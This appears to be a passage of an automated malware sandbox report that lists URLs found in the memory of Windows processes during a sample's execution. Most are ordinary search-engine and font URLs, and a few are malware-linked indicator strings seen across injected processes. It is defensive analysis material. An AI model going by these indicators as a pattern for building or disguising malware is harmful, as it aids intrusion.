        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://cnet.search.com/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
        Source: loaddll32.exe, powershell.exe, 00000017.00000003.539190602.000001F7F6630000.00000004.00000001.sdmp, explorer.exe, 00000020.00000002.723498987.0000000004E1E000.00000004.00000001.sdmp, control.exe, 00000021.00000002.568818148.0000000000B0E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000023.00000002.714776088.0000021DB8A3E000.00000004.00000001.sdmp, rundll32.exe, 00000024.00000002.569771101.000002067578E000.00000004.00000001.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
        Source: loaddll32.exe, 00000000.00000003.545737317.00000000013C0000.00000004.00000001.sdmp, powershell.exe, 00000017.00000003.539190602.000001F7F6630000.00000004.00000001.sdmp, explorer.exe, 00000020.00000002.723498987.0000000004E1E000.00000004.00000001.sdmp, control.exe, 00000021.00000002.568818148.0000000000B0E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000023.00000002.714776088.0000021DB8A3E000.00000004.00000001.sdmp, rundll32.exe, 00000024.00000002.569771101.000002067578E000.00000004.00000001.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://es.ask.com/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://find.joins.com/
        Source: explorer.exe, 00000020.00000000.564502715.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
        Source: loaddll32.exe, 00000000.00000003.545737317.00000000013C0000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000002.566786483.0000000001380000.00000040.00000001.sdmp, powershell.exe, 00000017.00000003.539190602.000001F7F6630000.00000004.00000001.sdmp, explorer.exe, 00000020.00000002.723498987.0000000004E1E000.00000004.00000001.sdmp, control.exe, 00000021.00000002.568818148.0000000000B0E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000023.00000002.714776088.0000021DB8A3E000.00000004.00000001.sdmp, rundll32.exe, 00000024.00000002.569771101.000002067578E000.00000004.00000001.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
        Source: RuntimeBroker.exe, 00000025.00000000.575870278.0000021910AF8000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.cmg
        Source: RuntimeBroker.exe, 00000025.00000000.575870278.0000021910AF8000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobp/
        Source: powershell.exe, 00000017.00000002.602970651.000001F7EDD72000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
        Source: powershell.exe, 00000017.00000002.586167297.000001F7DDF1E000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://rover.ebay.com
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
        Source: powershell.exe, 00000017.00000002.585596596.000001F7DDD11000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.about.com/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.com/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.in/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.auone.jp/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.de/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.es/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.in/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.it/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.interpark.com/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.nate.com/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.nifty.com/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.sify.com/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.yam.com/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://suche.aol.de/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
        Source: explorer.exe, 00000020.00000000.561193755.00000000075A0000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
        Source: RuntimeBroker.exe, 00000025.00000000.580472271.0000021913216000.00000004.00000001.sdmpString found in binary or memory: http://universalstore.streaming.mediaservices.windows.net/411ee20d-d1b8-4d57-ae3f-af22235d79d9/1f8e1
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://web.ask.com/
        Source: explorer.exe, 00000020.00000000.561193755.00000000075A0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.com
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.de/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
        Source: explorer.exe, 00000020.00000000.564502715.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
        Source: powershell.exe, 00000017.00000002.586167297.000001F7DDF1E000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.ask.com/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
        Source: explorer.exe, 00000020.00000002.707268029.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
        Source: explorer.exe, 00000020.00000000.564502715.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.docUrl.com/bar.htm
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/
        Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
        Source: explorer.exe, 00000020.00000000.564502715.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
        Source: explorer.exe, 00000020.00000000.564502715.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
        Source: explorer.exe, 00000020.00000000.564502715.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
        Source: explorer.exe, 00000020.00000000.564502715.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
        Source: explorer.exe, 00000020.00000000.564502715.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
        Source: explorer.exe, 00000020.00000000.564502715.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
